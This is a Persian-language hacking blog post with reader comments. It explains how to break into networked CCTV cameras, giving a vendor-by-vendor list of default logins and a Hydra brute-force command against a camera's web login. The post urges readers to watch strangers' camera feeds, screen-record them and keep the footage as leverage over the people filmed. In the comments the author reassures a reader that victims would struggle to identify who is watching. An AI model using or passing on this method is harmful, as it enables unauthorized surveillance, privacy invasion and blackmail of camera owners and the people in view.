نفوذ به دوربین مداربسته :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات
  • ۲۲ مرداد ۰۲، ۰۰:۳۴ - Sami
    مرسی
  • ۱۴ مرداد ۰۲، ۱۴:۴۶ - farhad
    salam

خب درود مجدد. اگه قسمت قبل این پست رو نخوندین حتما یه بک بزنین و پست قبل ینی اسکن دوربین مداربسته رو بخونین بعد بیاین ادامه رو اینجا. خب در قسمت قبل ما یسری تنظیمات رو باهم انجام دادیم تا آیپی دوربین مداربسته رو اسکن کنیم. در ادامه ما با پیدا کردن آیپی اون دوربین قصد داریم تا روش های نفوذ به اون رو باهم بررسی کنیم و ببینم یه از چه راه هایی میشه به دوربین مداربسته نفوذ کرد.

خب اول اینکه ما اسکن رو انجام دادیم. حالا چطور بفهمیم کدوم آیپی مال دوربین مداربسته ست؟ این اسکرین رو ببینین:

فهمیدین کدوم آیپی مال دوربینه؟ آفرین. خب حالا تونستیم آیپیشو کش بریم. الان چطور باید مورد عنایت قرار بدیمش؟ در ادامه با ما همراه باشید...

خب حالا آیپی دوربین رو توو مرورگر وارد کنید تا وارد صفحه لاگین شین. خب اول بهترین و راحت ترین کاری که میشه کرد اینه که یوزرنیم پسورد های دیفالت رو تست کنیم. این کار معمولا زمانی که طرف یوزرنیم پسورد رو تغییر نداده باشه جواب میده مثل زمانی که به مودم ADSL نفوذ میکردیم...

من یه لیست از یوزرنیم پسورد های دیفالت تفکیک شده با توجه به مدل دوربین براتون قرار میدم امیدوارم که به دردتون بخوره اول جای یوزرنیم پسورد admin بزنید اگه نشد توو لیست زیر بگردین :)

ACTi:admin/123456orAdmin/123456
AmericanDynamics:admin/adminoradmin/9999
ArecontVision:none
Avigilon:Previouslyadmin/admin,changedtoAdministrator/inlaterfirmwareversions
Axis:Traditionallyroot/pass,newAxiscamerasrequirepasswordcreationduringfirstlogin(thoughroot/passmaybeusedforONVIFaccess)
Basler:admin/admin
Bosch:Nonerequired,butnewfirmwares(6.0+)promptuserstocreatepasswordsonfirstlogin
Brickcom:admin/admin
Canon:root/camera
Cisco:Nodefaultpassword,requirescreationduringfirstlogin
Dahua:admin/admin
DigitalWatchdog:admin/admin
DRS:admin/1234
DVTel:Admin/1234
DynaColor:Admin/1234
FLIR:admin/fliradmin
FLIR(DahuaOEM):admin/admin
Foscam:admin/
GeoVision:admin/admin
Grandstream:admin/admin
Hikvision:Previouslyadmin/12345,butfirmware5.3.0anduprequiresuniquepasswordcreation
Honeywell:admin/1234
Intellio:admin/admin
IQinVision:root/system
IPX-DDK:root/adminorroot/Admin
JVC:admin/jvc
MarchNetworks:admin/
Mobotix:admin/meinsm
Northern:Previouslyadmin/12345,butfirmware5.3.0anduprequiresuniquepasswordcreation
Panasonic:Previouslyadmin/12345,butfirmware2.40requiresusername/passwordcreation
PelcoSarix:admin/admin
Pixord:admin/admin
Reolink:admin/
SamsungElectronics:root/rootoradmin/4321
SamsungTechwin(old):admin/1111111
Samsung(new):Previouslyadmin/4321,butnewfirmwaresrequireuniquepasswordcreation
Sanyo:admin/admin
Scallop:admin/password
Sentry360(mini):admin/1234
Sentry360(pro):none
Sony:admin/admin
Speco:admin/1234
Stardot:admin/admin
Starvedia:admin/
Trendnet:admin/admin
Toshiba:root/ikwd
VideoIQ:supervisor/supervisor
Vivotek:root/
Ubiquiti:ubnt/ubnt
Uniview:admin/123456
W-Box:admin/wbox123
Wodsee:admin/
خب براتون آرزو میکنم که سناریو اول جواب بده اگه جواب نداد جای نگرانی نیست. دیگه میریم سروقت آخرین فن استاد که کلکشو بکنیم بره. بله درست حدس زدین منظور از فن آخر استاد در کرک کردن استفاده از روش بروت فورس هه. که یه ابزار خوبی هم توو لینوکس داریم برای اینکار به اسم هیدرا hydra.
خب هیدرا رو آتیش کنین و با استفاده از دستور زیر که در ادامه توضیحات لازم رو براتون به عمل میارم، شروع میکنین به بروت فورس اتک Brute-force attack.
به دستور زیر دقت کنید:
hydra -s port -l username -P password_list_address/PassList.txt -e ns  IP http 
خب با کمک این دستور مبهم :) تلاش کنید تا بتونید شروع به بروت فورس اتک کنید ولی خب دلم سوخت برای اینکه زیاد گیج نشین یه توضیح مختصری بهتون میدم :(
اونی که نوشتم پورت و یوزرنیم و اینا که مشخصه توضیح نمیخواد. اونجایی که نوشتم پسورد لیست آدرس ینی باید یه پسورد لیست درست کنید و آدرسش رو در اون قسمت بنویسین. پسورد لیست درست کردن رو هم میزارم به پای خودتون که میدونم از پسش به راحتی برمیاین :) اون e هم ینی پسورد خالی که ns پسورد خالی رو تست میکنه...
در آخر هم اگه پسورد لیستتون خوب باشه و موفق بشه پسورد رو پیدا کنه با این تصویر مواجه میشین:
ینی تامام برین لاگین کنین و از کیفیت فول اچ دی طرف یا طرفین :( رو تماشا کنین و اسکرین رکورد هم بگیرین و یه آتوی خوشگل موشگل و حالشو ببرین ...
ان شاء الله که در راه خیر ازش استفاده شه در راه کمک به مستحقین و در راه خدا. سو استفاده هم نشه با تچکر :)

نظر (۱۰)

سلام

 

در ویندوز چ باید کرد؟! 

Virus32 32 Attacker ‌ :
سلام. میتونی هیدرا رو روی ویندوز هم نصب کنی
  • Virus32
  • تک تیر انداز
  • میگم برنامه یا آموزشی نداری ک بشه بازی هایی یا برنامه هارو فارسی نه‌ کنه از داخل

    Virus32 32 Attacker ‌ :
    یبار دیگه سوالت رو واضح تر بپرس
  • Virus32
  • تک تیر انداز
  • دنبال یک زبان برنامه نویسی یا یک برنامه ایم
    ک بشه برنامه هایه نصبی رو ویندوز رو فارسی کنه مثلان یک بازی یا برنامه دانلود کردی میخای فارسیش کنی دبنال این جور علمیم

    Virus32 Virus 32 :
    باید نرم افزار یا بازی مورد نظر ابتدا تحلیل بشه که با چه روشی چند زبانه شده
    مثلا من اینجا یاهو رو توضیح دادم
  • Virus32
  • تک تیر انداز
  • داش ویندوز نه مثلان یک بازی داری زبون هایه دیگه داخلشه ولی فارسی نداره یا زبونش فرق داره میخام فارسیشون کنم با چ نرم افزای فارسیش کنم؟

    Virus32 Virus 32 :
    هر کدوم متد خاص خودش رو داره
    میتونی مثل پستی که بهت اشاره کردم از کامپایلر محبوب ویژوآل استودیو استفاده کنی (فرمت dll)
    بیشتر هم زبان ها رو با فرمت bin. میسازن و در مسیر نصب بازی یا برنامه در پوشه LANGUAGES یا شبیه این قرارش میدن
    این فایلهای bin رو میتونی با hex editor ها ویرایش کنی
    بعضی ها با فرمت pot و ....
    بهترین زبان برای این کارها (مهندسی معکوس و هک نرم افزارها) هم سی هست.!
    اگه با سی آشنا شی همه شون رو میتونی دست کاری کنی در غیر این صورت برای هر مدل یه روش باید یاد بگیری
  • Virus32
  • تک تیر انداز
  • خوب داش اموزشش کجاس اگ فایلش نبود چیکار کنم؟؟
    کلا برنام ایی هس ک بشه فارسیش کرد؟

    Virus32 32 Attacker ‌ :
    لطفا اگه امکانش هست سوالتون رو زیر پست مربوط به خودش بپرسین. اگه پیدا نکردین پست مورد نظر رو. در قسمت پرسش و پاسخ بپرسین
    بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است

    ** ******* ** **** ******* **** *** ****

     

    hikvision ایپیم رو بلاک کرد :(

    داداش ویروس من نزدیک یک ساله که بخدا بیشتره دارم درخواست رمز رو میکنم همون پسورد پست های رمز دارتون ولی یا جواب نمیدین یا میگین باید صبر کنی 

     

    Virus32 Virus 32 :
    اگر در صفحه رمز مطالب درخواست داده باشی و ایمیلت و درست نوشته باشی تا الان ارسال شده اگر نشده هم دوباره درخواست بده و مطمئن باش ایمیلت رو درست وارد میکنی

    ایمیل اصلیم اینه   به این رمز رو ارسال کنید

    سلام. پس خودشون امکان نداره که بفهمن داریم به دوربینشون نفوذ میکنیم درسته؟

    Virus32 Virus 32 :
    سلام
    حقیقتش میشه فهمید
    ولی برای فهمیدن اینکه چه کسی داره دید میزنه نیاز به یه هکر درست و حسابی دارن!
    ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
    شما میتوانید از این تگهای html استفاده کنید:
    <b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
    تجدید کد امنیتی